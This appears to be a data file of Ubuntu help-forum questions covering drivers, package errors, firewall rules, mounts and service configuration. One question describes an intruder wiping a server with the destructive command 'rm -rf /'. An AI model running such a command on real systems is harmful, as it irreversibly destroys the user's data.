220602	i am using a bluetooth left-handed mouse in 12.04 lts 64bit . how to make it permanently left-handed ?	i need to set buttons manually with xinput set-button-map id 3 2 1 ... the mouse is eclipse touch mouse . connection was established using standard ubuntu bluetooth feature without passcode . the left-handed setting resets after short inactivity time ( probably mouse gets into sleep mode or something like this ) and mouse gets back to right-hand mode . how can i make the setting for left-hand use permanent , so that i can use my mouse left-handed all the time without the need to set button map manually ? i am a total beginner in ubuntu world . thank you .
220605	how can i hear in my headphones what comes through the line-in ?	i have a set of electronic drums that are connected to the line-in of my pc and i would like to direct the line-in input to the out device ( headphones ) so i can hear what i 'm playing through the pc speakers together with the sountrack that will be playing on the pc . thanks
220606	c library gl must be installed	i am trying to install dangerdeep . after installing dependancies suggested by web site and scon debug i get the message c library gl must be installed . i am working with ubuntu 12.04
220609	cd tray opens by itself	upgraded from 10.04 lts amd64 to 12.04 lts amd64 on a system running without a glitch for years . now my cd-rom burner opens by itself like in the bottom question that was closed by a moderator . a dvd burner is also installed in the system and works correctly . both are recognized and work in the system . no event is recorded in the event log of the tray opening , which happens randomly . closed question : what is opening/closing cd tray ? i have a fresh install of ubuntu 11.04 , and the cd tray opens and closes all by itself . i can not detect any pattern to when , or why . how can i determine what is causing this , and how can i stop it ?
220610	drivers for wifi card atheros ar928x - find and install	i am new in ubuntu and i had a big trouble with wifi . my ubuntu 12.10 does n't detect my wifi card and i ca n't toggle the `` activate wireless '' option on the tasks bar ( it is grey ) . i searched for drivers to make it work , but nothing worked for me . can anyone give me a hand ? many thanks in advanced ! lspci output 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:01.0 pci bridge : intel corporation mobile 4 series chipset pci express graphics port ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv710 [ mobility radeon hd 4500/5100 series ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati rv710/730 hdmi audio [ radeon hd 4000 series ] 02:00.0 ethernet controller : marvell technology group ltd. 88e8057 pci-e gigabit ethernet controller ( rev 10 ) 03:00.0 network controller : atheros communications inc. ar928x wireless network adapter ( pci-express ) ( rev 01 ) 0c:03.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 0c:03.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 0c:03.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) lshw -c network output *-network descripción : ethernet interface producto : 88e8057 pci-e gigabit ethernet controller fabricante : marvell technology group ltd. id físico : 0 información del bus : pci @ 0000:02:00.0 nombre lógico : eth0 versión : 10 serie : 00:24 : be:83 : b2:4f tamaño : 100mbit/s capacidad : 1gbit/s anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuración : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full ip=192.168.1.123 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s recursos : irq:45 memoria : d3520000-d3523fff ioport : c000 ( size=256 ) memoria : d3500000-d351ffff *-network desactivado descripción : interfaz inalámbrica producto : ar928x wireless network adapter ( pci-express ) fabricante : atheros communications inc. id físico : 0 información del bus : pci @ 0000:03:00.0 nombre lógico : wlan0 versión : 01 serie : 2c:81:58 : e6 : b6:03 anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuración : broadcast=yes driver=ath9k driverversion=3.5.0-18-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn recursos : irq:17 memoria : d2100000-d210ffff rfkill list all output 0 : phy0 : wireless lan soft blocked : yes hard blocked : yes 1 : sony-wifi : wireless lan soft blocked : yes hard blocked : no lsmo output module size used by rfcomm 37380 0 bnep 17707 2 bluetooth 183121 10 rfcomm , bnep parport_pc 31968 0 ppdev 12817 0 binfmt_misc 17260 1 snd_hda_codec_hdmi 31423 1 coretemp 13168 0 arc4 12473 2 microcode 18209 0 serio_raw 13031 0 snd_hda_codec_realtek 63356 1 r592 17707 0 memstick 15842 1 r592 lpc_ich 16925 0 snd_seq_midi 13132 0 snd_rawmidi 25382 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51255 2 snd_seq_midi , snd_seq_midi_event snd_hda_intel 32515 5 snd_hda_codec 111547 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13272 1 snd_hda_codec uvcvideo 71277 0 videobuf2_core 32070 1 uvcvideo snd_pcm 80163 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_device 14137 3 snd_seq_midi , snd_rawmidi , snd_seq videodev 95841 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12756 1 uvcvideo ath9k 130464 0 videobuf2_memops 13184 1 videobuf2_vmalloc sony_laptop 44183 0 snd_timer 24411 2 snd_seq , snd_pcm mac_hid 13037 0 mac80211 470382 1 ath9k ath9k_common 13783 1 ath9k ath9k_hw 393767 2 ath9k , ath9k_common snd 61991 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_rawmidi , snd_seq , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_seq_device , snd_timer ath 19187 3 ath9k , ath9k_common , ath9k_hw radeon 820703 3 cfg80211 183966 3 ath9k , mac80211 , ath soundcore 14599 1 snd snd_page_alloc 14036 2 snd_hda_intel , snd_pcm video 18847 0 ttm 75534 1 radeon drm_kms_helper 45271 1 radeon compat 14557 8 rfcomm , bnep , bluetooth , ath9k , mac80211 , ath9k_common , ath9k_hw , cfg80211 drm 230463 5 radeon , ttm , drm_kms_helper i2c_algo_bit 13197 1 radeon lp 13299 0 parport 40753 3 parport_pc , ppdev , lp hid_generic 12445 0 usbhid 41702 0 hid 82142 2 hid_generic , usbhid firewire_ohci 35521 0 firewire_core 57492 1 firewire_ohci crc_itu_t 12627 1 firewire_core sdhci_pci 18155 0 sdhci 27830 1 sdhci_pci sky2 52926 0
220611	music lens does n't work	my brother did something and now the music lens does n't work . now there 's no filter and no search results . yesterday , everything worked . how do i reinstall this lens ?
220618	what `` file system '' is supported by windows and linux ?	i 'm setting up a media centre for my living room so that i 'm able to watch downloaded films and tv shows on the big screen . the media centre is an old small computer which will have xbmcbuntu 12 installed on it . right now , the media centre has a 300 gb hdd partitioned into two : 1 ) ext4 50 gb ( where i 'll install the os ) 2 ) swap 6 gb ( swap area ) i 'm wanting a third partition which i can store all my media on to . this partition will fill the rest of my hdd . although , i 'm stuck on which file system i should set it to . i need the file system to be fully compatible with windows as i 'm going to be removing the hdd from the media centre and plugging it into my main pc , running windows 8 , to transfer the media onto it . i ca n't transfer over wi-fi as the media centre wo n't be connected to the internet . my options are : ext4 journaling , ext3 journaling , ext2 journaling , reiserfs journaling , btrfs journaling , jfs journaling , xfs journaling , fat16 and fat32 . i know that fat32 is compatible with windows but it can only hold files that are 4 gb or less and my films are well over 4 gb . some more than 10 gb . is there a file system i can use which is supported by linux and pops up under computer in windows ?
220621	alternative to wall , talk , write ?	for example : a cron script runs in background checking for updates . the user is logged into a virtual console ( tty ) . only wall has a nonbanner option . wall still adds unnecessary newlines at the beginning and the the end . also pressing enter to return to the prompt is awkward . are there any alternatives for displaying notifications in a tty console ?
220627	my vps was wiped , can i still access it ?	someone gained access into my ubuntu vps via ssh , they entered rm -rf / which wiped it and now i ca n't access it via ssh or sftp . on sftp i get the the following error : error : connection timed out error : could not connect to server and then on ssh , i try to connect to my vps ip on port 22 , it does n't come up with anything for ages ( it should come up asking for a username ) and then a op-up appears saying : network error : connection timed out . is it possible to fix this , if so , how ?
220632	usb flash drive not detected on 12.10 x64	my mediatek usb flash drive is not get detected . the o/p of lsusb falguni @ falguni-m61pme-s2p : ~ $ lsusb bus 002 device 002 : id 0e8d:0003 mediatek inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub and the o/p of usb-devices falguni @ falguni-m61pme-s2p : ~ $ usb-devices t : bus=01 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=480 mxch=10 d : ver= 2.00 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1d6b prodid=0002 rev=03.05 s : manufacturer=linux 3.5.0-18-generic ehci_hcd s : product=ehci host controller s : serialnumber=0000:00:02.1 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub t : bus=02 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=12 mxch=10 d : ver= 1.10 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1d6b prodid=0001 rev=03.05 s : manufacturer=linux 3.5.0-18-generic ohci_hcd s : product=ohci host controller s : serialnumber=0000:00:02.0 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub but in 12.04 , the o/p of usb-devices was : falguni @ falguni-m61pme-s2p : ~ $ usb-devices t : bus=01 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=480 mxch=10 d : ver= 2.00 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1d6b prodid=0002 rev=03.05 s : manufacturer=linux 3.5.0-18-generic ehci_hcd s : product=ehci host controller s : serialnumber=0000:00:02.1 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub t : bus=02 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=12 mxch=10 d : ver= 1.10 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1d6b prodid=0001 rev=03.05 s : manufacturer=linux 3.5.0-18-generic ohci_hcd s : product=ohci host controller s : serialnumber=0000:00:02.0 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub t : bus=02 lev=01 prnt=01 port=04 cnt=01 dev # = 2 spd=12 mxch= 0 d : ver= 2.00 cls=02 ( commc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=0e8d prodid=0003 rev=02.00 s : manufacturer=mediatek inc s : product=mt6235 c : # ifs= 2 cfg # = 1 atr=80 mxpwr=500ma i : if # = 0 alt= 0 # eps= 2 cls=0a ( data ) sub=00 prot=00 driver=cdc_acm i : if # = 1 alt= 0 # eps= 1 cls=02 ( commc ) sub=02 prot=01 driver=cdc_acm it was working fine in 12.04 . now after upgrading to 12.10 the problem started . where is the problem and how to solve it ?
220636	proper way to install skype x86-64 in ubuntu 12.04 after recent skype upgrade	i 'm having problens installing or upgrading skype in ubuntu 12.04 x86-64 after recent skype upgrade . sudo apt-get install skype it says skype depends on skype-bin and i 'm having held packages . i purged skype abd skype-bin and all it 's dependancies but still no go . why does it happen on lts which i use in my office ? ?
220637	errors in wlan tx packets on ubuntu 12.04	after upgrading to 12.04 lts , i am seeing tx errors popping up in ifconfig . i am using a broadcom4313 wlan controller . the command lsmod | grep wl gives : wl 2646601 0 lib80211 14040 2 lib80211_crypt_tkip , wl the wlan is connected but the speed is less than 10 kbps . the nm-tool reports : capabilities : speed : 1mb/s but my net connection is 15mbps ! ! !
220638	gwt 1.5.3 not working in ubuntu eclipse	i am not able to bring up the gwt 1.5.3 hosted mode in the ubuntu machine.i am getting - libstdc++.so.5 : can not open shared object file . i tried sudo apt-get install libstdc++5 but in vain . please kindly help me to overcome this issue .
220642	google voice plugin for gmail not working ( 12.04 x64 & firefox 17.0 )	when i try to use the `` call phones '' feature from the gmail chat pane , i get the following message with a link to the download of the *.deb file . please download the voice plugin to make a call . it used to work , and i 'm not sure when it stopped working because i do n't use it frequently . so far i 've purged the google-talkplugin ( via synaptic ) and tried manually reinstalling the 64 bit .deb file , both through software center and with dpkg -i *.deb . no success yet . i use a pretty standard set of code : ubuntu 12.04.01 x86_64 ( 3.2.0-33-generic ) firefox ( 17.0 ) google-talkplugin ( 3.10.2.0-1 ) update : i tried the 32bit .deb file . did not work , either .
220649	problem installing packages	i ca n't install any package , as i get this error : installarchives ( ) failed : e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory dpkg : regarding ... /libgcc1_1 % 3a4.7.2-2ubuntu1_amd64.deb containing libgcc1 : amd64 , pre-dependency problem : libgcc1 pre-depends on multiarch-support multiarch-support is unpacked , but has never been configured . dpkg : error processing /var/cache/apt/archives/libgcc1_1 % 3a4.7.2-2ubuntu1_amd64.deb ( -- unpack ) : pre-dependency problem - not installing libgcc1 : amd64 errors were encountered while processing : /var/cache/apt/archives/libgcc1_1 % 3a4.7.2-2ubuntu1_amd64.deb error in function : dpkg : dependency problems prevent configuration of libc6 : amd64 : libc6 : amd64 depends on libgcc1 ; however : package libgcc1 is not installed . libc6 : amd64 depends on tzdata ; however : package tzdata is not installed . dpkg : error processing libc6 : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of multiarch-support : multiarch-support depends on libc6 ( > = 2.3.6-2 ) ; however : package libc6 : amd64 is not configured yet . dpkg : error processing multiarch-support ( -- configure ) : dependency problems - leaving unconfigured
220652	is dd taking too long ?	i set up dd to clone a smaller system 40.00gb hard drive ( /dev/sda ) to a new bigger 111.00gb one connected via a usb reader ( dev/sdb ) and its been going for two hours now . the activity meter on the new hard drive shows it 's doing something . but the cpu is only about 20 % . when is this thing going to complete ? should i re-start the process ?
220653	what is the difference between pm-suspend and pm-suspend-hybrid ?	i read the man pages of both of them but i could n't figure out the difference . man page says : hybrid-suspend is the process where the system does everything it needs to hibernate , but suspends instead of shutting down . this means that your computer can wake up quicker than for normal hibernation if you do not run out of power is n't that the same as suspend ?
220660	altering the prompt	ok , so i am trying to create an alias , that would allow me to set the current directory in the terminal , the base directory to be displayed in prompt . let 's assume the alias is named basedir for instance : andrepadez @ thelookingglass : ~ $ cd shared andrepadez @ thelookingglass : ~/shared $ cd development/ andrepadez @ thelookingglass : ~/shared/development $ cd nodejs/ right now , i would run that alias and i would get the following prompt : andrepadez @ thelookingglass : ~/shared/development/nodejs $ basedir andrepadez @ thelookingglass : nodejs $ from now , every time i change to a forward directory , i would get the prompts : andrepadez @ thelookingglass : nodejs $ cd project1 andrepadez @ thelookingglass : nodejs/project1 $ cd static andrepadez @ thelookingglass : nodejs/project1/static $ cd .. andrepadez @ thelookingglass : nodejs/project1 $ ... ( i really do n't care what happens if i go back to folders behind my base directory ) is there a way to create such a command ? i have found something close , but it always shows only the current directory : alias basedir= '' export ps1='\u @ \h : \w $ ' '' thanks
220664	boot-repair after messing up ntfs partition	i posted this question explaining what happened after i tried to create a new swap partition on a win/ubuntu dual-boot machine . i have since created a live-boot usb and installed boot-repair . i had it `` recommend repairs '' , after which it tried repairing the wubi filesystems , which as far as i 'm aware was not necessary . i 'm not sure where to go from here ; i do n't care very much about backing up my files , i just want to be able to boot the machine . in the advanced options the `` repair windows boot files '' box is uncheckable both grub tabs are unclickable ( i do have grub installed ) here is my pastebinit with the details from the boot-repair . please be as explicit as possible , as i am proving to be disproportionately bad at this type of task . thank you ! p.s . i keep seeing : cryptsetup : warning : failed to detect canonical device of overlayfs cryptsetup : warning : could not determine root device from /etc/fstab testdisk : gparted :
220665	iptables working strangely	i have ubuntu 12.04 x64 installed in my laptop . i 'm quite new to linux , and i wanted to specify certain rules for the iptables firewall . this is the saved config of my iptables : *mangle : prerouting accept [ 0:0 ] : input accept [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 0:0 ] : postrouting accept [ 0:0 ] commit *nat : prerouting accept [ 0:0 ] : input accept [ 0:0 ] : output accept [ 0:0 ] : postrouting accept [ 0:0 ] -a prerouting -p tcp -m tcp -- dport 3306 -j dnat -- to-destination 192.168.1.100:3306 -a prerouting -p tcp -m tcp -- dport 11002 -j dnat -- to-destination 192.168.1.100:11002 -a prerouting -p tcp -m tcp -- dport 13000 -j dnat -- to-destination 192.168.1.100:13000 -a prerouting -p tcp -m tcp -- dport 13001 -j dnat -- to-destination 192.168.1.100:13001 -a prerouting -p tcp -m tcp -- dport 13002 -j dnat -- to-destination 192.168.1.100:13002 -a prerouting -p tcp -m tcp -- dport 13003 -j dnat -- to-destination 192.168.1.100:13003 -a prerouting -p tcp -m tcp -- dport 13004 -j dnat -- to-destination 192.168.1.100:13004 -a prerouting -p tcp -m tcp -- dport 13061 -j dnat -- to-destination 192.168.1.100:13061 -a prerouting -p tcp -m tcp -- dport 13099 -j dnat -- to-destination 192.168.1.100:13099 -a postrouting -j masquerade commit *filter : input drop [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 0:0 ] -a input -i eth0 -p tcp -m tcp -- dport 3306 -j accept -a input -i eth0 -p tcp -m tcp -- dport 80 -j accept commit in theory , what it does is to drop all connections in all ports except for http , mysql and few other ports . moreover , it redirects all mysql and 13000-13004..etc port connections to a specific local ip in the same port , which is 192.168.1.100 . but what i find strange is that when my firewall is active , it blocks absolutely all the input connections , even those which must not block ( http , mysql ) . in fact , i 'm literally blocked and i ca n't establish any external connection . what am i doing wrong ? ps : i tested the firewall without those redirections , and it still block all inputs , so i suppose it 's not the problem .
220670	help with vpn on ubuntu 12.04 ?	i 'm a first time user of vpn-connection and was thinking if someone could give me clear and simple instructions on how to use it = ) i have succesfully created my vpn-connection , but now my problem is the following : `` now what ? '' do i just open the browser ? then what ? i have tried googling but have n't in 1 hour found answer good enough ... how do i access the network 's files i have connected to ? how can i browse the them ? do i need a client software or what ? where do i click etc etc . my os is ubuntu 12.04 . thanx for any advice = )
220671	unable to access software sources	also when trying to access it from ubuntu software center the entry that says `` edit software sources '' is greyed out . finally when running cp /usr/share/applications/software-properties-gtk.desktop ~/.local/share/applications/ i receive the following message cp : can not stat `/usr/share/applications/software-properties-gtk.desktop ' : no such file or directory and when i run gedit ~/.local/share/applications/software-properties-gtk.desktop it opens a blank text file in geddit . how can i get a software sources back ?
220673	how to configure gmail integration to monitor only the inbox	the new web application integration feature on 12.10 is able to link gmail to the standard notification tray widget . it 's a cool feature , but it 's usefulness is diminished because it is activated ( `` turns blue '' ) when there is any unread email in any label . is there a way to specify that i only want to be notified when there is unread email on the inbox ?
220678	what is wrong with my fstab ?	trying to get a second drive to mount into /media/media folder : /dev/sda /media/media ext4 auto , exec , rw , user , async 0 0 but it is failing , causing me to skip . using 12.04 . here is the full fstab file : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb1 during installation uuid=72e34f04-a84f-41b5-931c-8e1a08b0315e / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb5 during installation uuid=d2a7845a-01cc-4a55-93a6-f86b694804de none swap sw 0 0 /dev/sda /media/media ext4 auto , exec , rw , user , async 0 0 here is my error : fsck.ext4 : bad magic number in super-block while trying to open /dev/sda /dev/sda : the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device & gt ; mountall : fsck /media/media [ 708 ] terminated with status 8 mountall : unrecoverable fsck error : /media/media /dev/sdb1 : clean , 197231/7331840 files , 1544679/29305088 blocks ignoring errors with /media/media at user request mount : wrong fs type , bad option , bad superblock on /dev/sda , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so mountall : mount /media/media [ 808 ] terminated with status 32 mountall : filesystem could not be mounted : /media/media skipping /media/media at user request
220679	the ubuntu download site have a bug - doesnt belong here	i know that this message should not be posted in this website but but i feel compelled . when an user try to download the new release , ubuntu 12.10 quantzal qental , no matter the bits version ( 32 nor 64 ) , the user must click on the get ubuntu 12.10 button . then the site open the contributing page before download ubuntu . then if the user does n't want to pay , he must click on not now , take me to the download button . here is the problem , that button has the following link : http : //www.ubuntu.com/download/desktop/thank-you ? distro=desktop & bits=32 & release=lts that is wrong ! because the user will get the 12.04 lts release . you can see what i get with the following sequence of pictures : i tried this on different browsers ( mozilla - chrome ) and with different os ( ubuntu 12.10 - windows 7 ) and the result is the same . i have sent a message to the webmaster but i did n't had any response . this problem does n't happen in some country different that mine , so i think that the problem is in the argentina 's server .
220685	remove files of certain type , retain directory tree	i 'm trying to move a bunch of .doc and .xls files , which are stored in a bunch of folders and subfolders , to a new location . i previously tried cp -r **/ { *.doc , *.xls } /wherever/you/want/ , which worked except that it did n't retain the directory tree faster . question : is there a command/set of commands to purge all files except for .doc and .xls in a folder and its subfolders , yet retain directory tree structure ? and better yet , is there a command to remove empty folders , so i do n't have to go through afterwards and manually delete empty folders ?
220686	ubuntu 12.10 running on vmware fusion 3.1.1	here is a picture of the problem : http : //screencast.com/t/x0rpyrqa for some reason , ubuntu 12.10 32-bit in vmware fusion 3.1.1 is showing multiple small screens . i am not aware if ubuntu 12.10 is or is n't supported with this version of vmware , but if anyone could help that would be great .
220691	ubuntu 12.10 music folders to ipad	how can i move my music files from ubuntu 12.10 to an old ipad classic that a friend gave me ? or is it possible ?
220696	why do some indicator icons have gtk2 and gtk3 versions , while others have only a single version that works with both libraries ?	for example , in ubuntu we have : indicator-application indicator-application-gtk2 indicator-sound indicator-sound-gtk2 but other indicators have only a single version that works on both : indicator-cpufreq indicator-weather still others have no gtk2 version and will not work with gtk2-based desktops : indicator-messaging why do some indicators need to be maintained in two versions while others do not ?
220699	changing internal home network ip address for connected devices	i have a few computers at home . for each of the computers , i can see the internal home network ip address on any given device by typing in ifconfig in the terminal . if the device is connected to the home network via ethernet connection or via the built-in wireless connections in laptops , the internal ip address for each of the devices seems to be 192.168.0.x . however , when i connect one of the devices using an external usb modem wireless adapter , which connects to the home network through wireless , when i check the ip address via ifconfig , for some reason it gets assigned 192.168.42.x instead . why are the ethernet and build in wireless connections getting 192.168.0.x , but the external usb wireless adapter gets 192.168.42.x ? more importantly , is it possible to force it to get an internal ip address of 192.168.0.x ?
220701	i ca n't install any package , dependency problems	the apt-get command does n't work . when i try this sudo dpkg -- configure -a , i get this : dpkg : dependency problems prevent configuration of libc6 : amd64 : libc6 : amd64 depends on libgcc1 ; however : package libgcc1 is not installed . libc6 : amd64 depends on tzdata ; however : package tzdata is not installed . dpkg : error processing libc6 : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of multiarch-support : multiarch-support depends on libc6 ( > = 2.3.6-2 ) ; however : package libc6 : amd64 is not configured yet . dpkg : error processing multiarch-support ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libc6 : amd64 multiarch-support
220705	how do i change bleachbit 's icon ?	bleachbit is a really useful application and i use it daily . however , its icon is not the best , so i would like to change it . i really do n't want to download a new icon theme , i 'm happy with the default , i just want to change bleachbit 's icon . i 've got the faenza bleachbit icon , that is what i 'd like to use as a replacement . how can i do this ? i 'm just a user but i 'm happy with terminal commands .
220708	insane load average after reboot	after doing a reboot of ubuntu server 12.04 lts ( after an apt-get dist-upgrade ) my server load ( on a 16gb ) machine goes insane ( around 80 ) for about 10 or 15 minutes the only things i can think of is the second mysql process : $ ps aux | sort -k6 -rn | head -30 mysql 1004 18.0 3.5 4230596 572500 ? ssl 15:02 3:33 /usr/sbin/mysqld www-data 2616 0.4 0.2 360840 42784 ? s 15:14 0:02 /usr/sbin/apache2 -k start ... [ 10 ditto of the above ] www-data 2981 1.2 0.2 354968 39324 ? s 15:21 0:00 /usr/sbin/apache2 -k start root 1363 0.0 0.2 136628 38716 ? s 15:02 0:00 /usr/bin/mysql -- defaults-file=/etc/mysql/debian.cnf -- skip-column-names -- batch -e ? select concat ( 'select count ( * ) into @ discard from ` ' , ? table_schema , '`.` ' , table_name , '` ' ) ? from information_schema.tables where engine='myisam' postgrey 1075 0.0 0.0 66756 14180 ? ss 15:02 0:00 /usr/sbin/postgrey -- pidfile=/var/run/postgrey.pid -- daemonize -- inet=10023 joecool 1581 0.0 0.0 28072 9064 pts/0 ss 15:03 0:00 -bash joecool 2991 0.0 0.0 28072 7728 pts/0 r+ 15:22 0:00 -bash with top showing pid user pr ni virt res shr s % cpu % mem time+ command 1004 mysql 20 0 3864m 299m 8092 s 10 1.9 1:41.28 mysqld 2433 www-data 20 0 346m 38m 3504 s 3 0.2 0:00.17 apache2 2551 www-data 20 0 328m 19m 3412 s 1 0.1 0:00.05 apache2 2417 www-data 20 0 338m 29m 3792 s 1 0.2 0:00.11 apache2 35 root 20 0 0 0 0 s 0 0.0 0:00.85 kswapd0 77 root 20 0 0 0 0 s 0 0.0 0:01.21 kworker/0:2 2448 www-data 20 0 324m 16m 3484 s 0 0.1 0:00.08 apache2 2537 www-data 20 0 327m 18m 3476 s 0 0.1 0:00.06 apache2 1 root 20 0 24340 2348 1356 s 0 0.0 0:00.82 init is this normal ?
220710	user job not wokring in upstart 1.5	i have my xyz.conf upstart config file in my $ home/.init directory . when i run `` start xyz '' i get this error : start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.56 '' ( uid=1001 pid=11389 comm= '' start xyz `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) thats what inside of my xyz.conf : start on startup stop on shutdown env home=/home/qwerty setuid qwerty setgid qwerty exec $ home/xyz/xyz i am using upstart 1.5 and `` qwerty '' is non-privileged user . is there a solution except using su/sudo/start-stop-daemon ?
220715	ubuntu 12.04 - wakes from suspend by itself	this problem has only just started and i do n't know what has changed to cause it . i suspend my ubuntu 12.04 pc and it used to stay asleep until i hit the enter key to wake it up but for the last week or so it 's been waking itself up . i 've checked the bios settings and all the wake on lan settings are disabled . i 've used the ethtool command and the wake on lan is set to `` d '' which i 've read been off . can anyone suggest anything ?
220716	how to move over from init.d to upstart for nginx	i have an init.d script for nginx that normally works fine . however , after a reboot it does n't work properly and the worker process would die leaving just the master process . nginx has some mongodb stuff ( nginx-gridfs ) compiled in and needs to start after mongodb which is being started by upstart . that 's all i 've been able to figure out after some troubleshooting . i believe i have to change over nginx to upstart and make it dependent on mongo . how can i do that ?
220717	what is the program `` additional drivers '' ( jockey-gtk ) talking me about ?	the program says : '' no proprietary drivers are in use on this system '' but it does n't say if it is talking about graphical drivers only or what . then , it lists two drivers : nvidia accelerated graphics driver ( version 173 ) . nvidia accelerated graphics driver ( version current ) [ recomended ] both have exactly the same description . what is the difference between them , then ? ? . moreover , when i select the 1st one , it says : `` this driver is not activated '' , and there 's a button to `` activate '' it . when i select the 2nd one , it says : `` this driver is activated but it is not currently in use '' , and the button is to `` remove '' . so , which one is in use ? . why , or what for , should i have one activated ( enabled ) but not in use ? if a driver is in use it means it is activated ? ( as i see it can be activated but not in use ) . what is the difference between deactivate and remove ? , and what is the relationship between : installed , activated , in use , and enabled ; and between : removed , disabled , inactive and not-installed ? why can i activate the inactivated and remove ( but not deactivate ) the activated that is not in use ? all this is very puzzling ... what other drivers can i use for an apple macbook pro 3,1 and how ? i see that there 's a nouveau and i heard that there was going to be a new open source even better . > -display > description : vga compatible controller > product : g84 [ geforce 8600m gt ] > vendor : nvidia corporation please stop deleting this : 1.as i have written several times , the system is natty , and the questions remain the same . 2 . the package nvidia-current is installed .
220722	why does update manager install the i386 version of skype on an amd64 system ?	update manager just updated the skype-bin package . i was surprised to see that it is an i386 version and not the 64 bit version given that skype is now multiarch . can someone explain why ? does an amd64 system still contain i386 packages ?
